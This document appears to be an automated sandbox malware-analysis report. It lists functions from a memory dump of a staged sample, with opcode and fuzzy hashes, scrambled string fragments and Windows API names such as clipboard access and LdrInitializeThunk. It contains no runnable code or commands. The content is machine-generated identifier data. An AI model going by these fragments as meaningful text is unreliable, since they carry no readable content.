                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                              • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                                                              • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                              • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

                                                                                              Non-executed Functions

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                              • API String ID: 0-3492884535
                                                                                              • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                              • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                              • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                              • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                              • API String ID: 0-1763234448
                                                                                              • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                                              • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                              • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                                              • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                                                              • API String ID: 0-1826372655
                                                                                              • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                              • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                                              • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                              • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                                              APIs
                                                                                                • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                              • String ID: / $/,-$46
                                                                                              • API String ID: 764372645-479303636
                                                                                              • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                              • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                                              • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                              • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                                              • API String ID: 0-3328159043
                                                                                              • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                              • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                                              • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                              • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 1006321803-0
                                                                                              • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                              • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                              • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                              • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                              • API String ID: 0-2309992716
                                                                                              • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                              • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                              • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                              • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                              • API String ID: 0-1906979145
                                                                                              • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                              • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                              • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                              • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "$-+$/$hI
                                                                                              • API String ID: 0-2772680581
                                                                                              • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                              • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                                                              • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                              • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,JHj$Hs$bc$v
                                                                                              • API String ID: 0-909542228
                                                                                              • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                              • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                                                              • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                              • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,JHj$Hs$bc$v
                                                                                              • API String ID: 0-909542228
                                                                                              • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                              • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                              • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                              • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,JHj$Hs$bc$v
                                                                                              • API String ID: 0-909542228
                                                                                              • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                              • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                              • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                              • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,JHj$Hs$bc$v
                                                                                              • API String ID: 0-909542228
                                                                                              • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                              • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                              • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                              • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: ,$i$r}A
                                                                                              • API String ID: 2994545307-2114006112
                                                                                              • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                              • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                              • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                              • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gfff$i$r}A
                                                                                              • API String ID: 0-3931832132
                                                                                              • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                              • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                              • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                              • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 34$C]$|F
                                                                                              • API String ID: 0-2804560523
                                                                                              • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                              • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                              • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                              • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ef$TQ][$sWK)
                                                                                              • API String ID: 0-3401374238
                                                                                              • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                              • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                                              • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                              • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: +|-~$/pqr$_
                                                                                              • API String ID: 0-1379640984
                                                                                              • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                              • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                              • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                              • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0K)$4*VP
                                                                                              • API String ID: 0-3626284114
                                                                                              • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                              • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                              • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                              • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: i$r}A
                                                                                              • API String ID: 2994545307-2976846027
                                                                                              • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                              • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                                                              • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                              • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: P<?$P<?
                                                                                              • API String ID: 0-3449142988
                                                                                              • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                              • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                                                              • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                              • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: f
                                                                                              • API String ID: 2994545307-1993550816
                                                                                              • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                              • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                                                              • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                              • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Dx
                                                                                              • API String ID: 0-3832465965
                                                                                              • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                              • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                              • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                              • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: {}
                                                                                              • API String ID: 0-4269290415
                                                                                              • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                              • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                              • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                              • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: /,-
                                                                                              • API String ID: 2994545307-1700940157
                                                                                              • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                              • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                                                              • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                              • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: VtA
                                                                                              • API String ID: 2994545307-3724035812
                                                                                              • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                              • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                                                              • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                              • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "
                                                                                              • API String ID: 0-123907689
                                                                                              • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                              • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                                                              • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                              • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: klm
                                                                                              • API String ID: 0-3800403225
                                                                                              • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                              • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                                                              • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                              • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: ?^A
                                                                                              • API String ID: 2994545307-4120214115
                                                                                              • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                              • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                                                                              • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                              • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%
                                                                                              • API String ID: 0-4214564638
                                                                                              • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                                                              • Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
                                                                                              • Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                                                              • Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
